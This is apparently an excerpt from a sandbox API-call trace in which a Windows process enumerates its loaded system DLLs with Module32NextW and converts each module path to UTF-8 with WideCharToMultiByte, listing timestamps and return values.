	[0107.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\Secur32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\Secur32.dll", lpUsedDefaultChar=0x0) returned 32
	[0107.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Secur32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Secur32.dll", lpUsedDefaultChar=0x0) returned 12
	[0107.521] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.522] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\iertutil.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\iertutil.dll", lpUsedDefaultChar=0x0) returned 33
	[0107.522] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="iertutil.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iertutil.dll", lpUsedDefaultChar=0x0) returned 13
	[0107.522] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ondemandconnroutehelper.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ondemandconnroutehelper.dll", lpUsedDefaultChar=0x0) returned 48
	[0107.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ondemandconnroutehelper.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ondemandconnroutehelper.dll", lpUsedDefaultChar=0x0) returned 28
	[0107.523] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\WinSCard.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\WinSCard.dll", lpUsedDefaultChar=0x0) returned 33
	[0107.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinSCard.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinSCard.dll", lpUsedDefaultChar=0x0) returned 13
	[0107.525] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\DEVOBJ.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\DEVOBJ.dll", lpUsedDefaultChar=0x0) returned 31
	[0107.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEVOBJ.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEVOBJ.dll", lpUsedDefaultChar=0x0) returned 11
	[0107.526] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPT32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPT32.dll", lpUsedDefaultChar=0x0) returned 32
	[0107.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRYPT32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRYPT32.dll", lpUsedDefaultChar=0x0) returned 12
	[0107.527] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\MSASN1.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\MSASN1.dll", lpUsedDefaultChar=0x0) returned 31
	[0107.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSASN1.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSASN1.dll", lpUsedDefaultChar=0x0) returned 11
	[0107.528] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SRVCLI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SRVCLI.DLL", lpUsedDefaultChar=0x0) returned 31
	[0107.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SRVCLI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SRVCLI.DLL", lpUsedDefaultChar=0x0) returned 11
	[0107.530] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SAMLIB.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SAMLIB.dll", lpUsedDefaultChar=0x0) returned 31
	[0107.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAMLIB.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SAMLIB.dll", lpUsedDefaultChar=0x0) returned 11
	[0107.531] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\BROWCLI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\BROWCLI.DLL", lpUsedDefaultChar=0x0) returned 32
	[0107.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BROWCLI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BROWCLI.DLL", lpUsedDefaultChar=0x0) returned 12
	[0107.533] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\WINMM.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\WINMM.dll", lpUsedDefaultChar=0x0) returned 30
	[0107.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINMM.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINMM.dll", lpUsedDefaultChar=0x0) returned 10
	[0107.534] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\WINMMBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\WINMMBASE.dll", lpUsedDefaultChar=0x0) returned 34
	[0107.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINMMBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINMMBASE.dll", lpUsedDefaultChar=0x0) returned 14
	[0107.535] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\mswsock.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\mswsock.dll", lpUsedDefaultChar=0x0) returned 32
	[0107.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mswsock.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mswsock.dll", lpUsedDefaultChar=0x0) returned 12
	[0107.536] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\WINNSI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\WINNSI.DLL", lpUsedDefaultChar=0x0) returned 31
	[0107.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINNSI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINNSI.DLL", lpUsedDefaultChar=0x0) returned 11
	[0107.537] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\NSI.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\NSI.dll", lpUsedDefaultChar=0x0) returned 28
	[0107.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NSI.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NSI.dll", lpUsedDefaultChar=0x0) returned 8
	[0107.539] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\DNSAPI.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\DNSAPI.dll", lpUsedDefaultChar=0x0) returned 31
	[0107.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DNSAPI.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DNSAPI.dll", lpUsedDefaultChar=0x0) returned 11
	[0107.540] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\urlmon.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\urlmon.dll", lpUsedDefaultChar=0x0) returned 31
	[0107.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="urlmon.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="urlmon.dll", lpUsedDefaultChar=0x0) returned 11
	[0107.541] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.542] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\wkscli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\wkscli.dll", lpUsedDefaultChar=0x0) returned 31
	[0107.542] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wkscli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wkscli.dll", lpUsedDefaultChar=0x0) returned 11
	[0107.543] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\bcrypt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\bcrypt.dll", lpUsedDefaultChar=0x0) returned 31
	[0107.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bcrypt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bcrypt.dll", lpUsedDefaultChar=0x0) returned 11
	[0107.544] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPTSP.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPTSP.dll", lpUsedDefaultChar=0x0) returned 32
	[0107.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRYPTSP.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRYPTSP.dll", lpUsedDefaultChar=0x0) returned 12
	[0107.545] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.546] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\rsaenh.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\rsaenh.dll", lpUsedDefaultChar=0x0) returned 31
	[0107.546] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rsaenh.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rsaenh.dll", lpUsedDefaultChar=0x0) returned 11
	[0107.546] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\clbcatq.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\clbcatq.dll", lpUsedDefaultChar=0x0) returned 32
	[0107.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="clbcatq.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="clbcatq.dll", lpUsedDefaultChar=0x0) returned 12
	[0107.547] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\fwpuclnt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\fwpuclnt.dll", lpUsedDefaultChar=0x0) returned 33
	[0107.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fwpuclnt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fwpuclnt.dll", lpUsedDefaultChar=0x0) returned 13
	[0107.549] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\rasadhlp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\rasadhlp.dll", lpUsedDefaultChar=0x0) returned 33
	[0107.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rasadhlp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rasadhlp.dll", lpUsedDefaultChar=0x0) returned 13
	[0107.567] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\schannel.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\schannel.dll", lpUsedDefaultChar=0x0) returned 33
	[0107.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="schannel.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="schannel.dll", lpUsedDefaultChar=0x0) returned 13
	[0107.568] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\mskeyprotect.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\mskeyprotect.dll", lpUsedDefaultChar=0x0) returned 37
	[0107.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mskeyprotect.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mskeyprotect.dll", lpUsedDefaultChar=0x0) returned 17
	[0107.569] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ncrypt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ncrypt.dll", lpUsedDefaultChar=0x0) returned 31
	[0107.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ncrypt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncrypt.dll", lpUsedDefaultChar=0x0) returned 11
	[0107.570] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\NTASN1.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\NTASN1.dll", lpUsedDefaultChar=0x0) returned 31
	[0107.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NTASN1.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NTASN1.dll", lpUsedDefaultChar=0x0) returned 11
	[0107.571] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\WINTRUST.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\WINTRUST.dll", lpUsedDefaultChar=0x0) returned 33
	[0107.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINTRUST.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINTRUST.dll", lpUsedDefaultChar=0x0) returned 13
	[0107.572] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\gpapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\gpapi.dll", lpUsedDefaultChar=0x0) returned 30
	[0107.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gpapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gpapi.dll", lpUsedDefaultChar=0x0) returned 10
	[0107.573] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\ncryptsslp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\ncryptsslp.dll", lpUsedDefaultChar=0x0) returned 35
	[0107.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ncryptsslp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncryptsslp.dll", lpUsedDefaultChar=0x0) returned 15
	[0107.574] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\dhcpcsvc6.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\dhcpcsvc6.DLL", lpUsedDefaultChar=0x0) returned 34
	[0107.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dhcpcsvc6.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dhcpcsvc6.DLL", lpUsedDefaultChar=0x0) returned 14
	[0107.576] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\dhcpcsvc.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\dhcpcsvc.DLL", lpUsedDefaultChar=0x0) returned 33
	[0107.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dhcpcsvc.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dhcpcsvc.DLL", lpUsedDefaultChar=0x0) returned 13
	[0107.577] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.578] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.579] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\pnrpnsp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\pnrpnsp.dll", lpUsedDefaultChar=0x0) returned 32
	[0107.579] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pnrpnsp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pnrpnsp.dll", lpUsedDefaultChar=0x0) returned 12
	[0107.579] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\NLAapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\NLAapi.dll", lpUsedDefaultChar=0x0) returned 31
	[0107.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NLAapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NLAapi.dll", lpUsedDefaultChar=0x0) returned 11
	[0107.580] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\winrnr.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\winrnr.dll", lpUsedDefaultChar=0x0) returned 31
